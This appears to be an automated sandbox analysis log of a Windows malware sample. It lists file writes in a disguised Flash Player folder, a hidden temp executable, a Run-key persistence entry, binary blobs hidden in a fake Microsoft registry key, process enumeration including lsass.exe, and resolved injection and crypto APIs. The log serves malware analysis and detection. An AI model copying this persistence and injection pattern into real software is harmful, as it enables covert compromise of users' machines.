Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	3	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	size = 196608, size_out = 196608	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	2	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	2	Fn Data
Read	-	size = 4, size_out = 4	2	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	size = 196608	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776	2	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	size = 171	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig	size = 720	1	Fn Data
Write	-	size = 4	3	Fn Data
Write	-	size = 766	1	Fn Data
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	-	1	Fn

Registry (181)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	4	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	4	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	10	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	10	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	7	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	2	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	2	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	2	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	2	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	10	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	6	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	8	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	2	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	6	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	8	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	6	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	8	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ	1	Fn
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	3	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, size = 1776, type = REG_BINARY	2	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	3	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, size = 88160, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	2	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, size = 200848, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, size = 295088, type = REG_BINARY	1	Fn Data

Process (251)

Operation	Process	Additional Information	Count	Logfile
Create	"C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe"	os_pid = 0x594, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE	1	Fn
Open	System	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	3	Fn

Module (228)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.dll	base_address = 0x759c0000	1	Fn
Load	USER32.dll	base_address = 0x758c0000	1	Fn
Load	CRYPT32.dll	base_address = 0x76240000	1	Fn
Load	ADVAPI32.dll	base_address = 0x77740000	1	Fn
Load	SHELL32.dll	base_address = 0x76a70000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76370000	1	Fn
Load	PSAPI.DLL	base_address = 0x75ad0000	1	Fn
Load	ole32.dll	base_address = 0x75ae0000	1	Fn
Load	GDI32.dll	base_address = 0x76950000	1	Fn
Load	WININET.dll	base_address = 0x75f20000	1	Fn
Load	urlmon.dll	base_address = 0x76690000	1	Fn
Load	OLEAUT32.dll	base_address = 0x761b0000	1	Fn
Load	Secur32.dll	base_address = 0x75690000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77cb0000	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x759d7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x759d49d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x759d89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77cf1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x759e10b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x759d34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77cde026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x759d35b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x759ed9b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x759d2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ce45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x759ddd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x759d14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x759d5a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x759fd4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x759d103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x759d170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x759d1400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x759d5a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x759ed9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x759fd075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x759ed5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x759d5151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x759ece2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x759d17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x759d469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x759d1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x759d1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x759d1ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x759d1886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x759d1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x77d2742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x759d7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x759d11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x759f830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x759d3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x759d195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x759ed851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x759f5c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x759fc7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a5416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a5414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a541df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a540fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x759d5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x759d418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x759d44ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x759d1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x759d17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77ce2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x759d465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x759d192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x759ed4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x759d1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x759d4407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x759d111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77cd2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x759d4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x759eecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a544cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x759d1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x759d4173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x759d1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x759d54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77cd22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x759d1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x759d4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x759d15d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x759ed4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x759d11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x759d14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x759d4a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x759ed9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x759d59e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x759d4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x759d1462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x759ec860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x759d3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x759d4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x759d34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x759d34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x759d1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x759d492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x759f8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x759f896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x759d11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x759f735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x759d3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x759d424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x759d16dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x759d1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x759d16c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x759d10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x759d183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x759d1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x759d4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x759d110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x759d186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x758e49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x758e8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x758dfbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x758e1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ce25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x758d8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x758d9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x758e2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x758e3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75931a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x758d7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x758e05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x758d787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x758db17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x758e6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x758dd156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x758df350	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x758d9a55	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x76256c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x7624d718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7775469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x777545f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7776779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x77750e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x777540e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x77750e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x77752a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x777540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x7774c54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x77749fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x7774f4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7774df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7774df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x77754680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x777514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7774df66	1	Fn
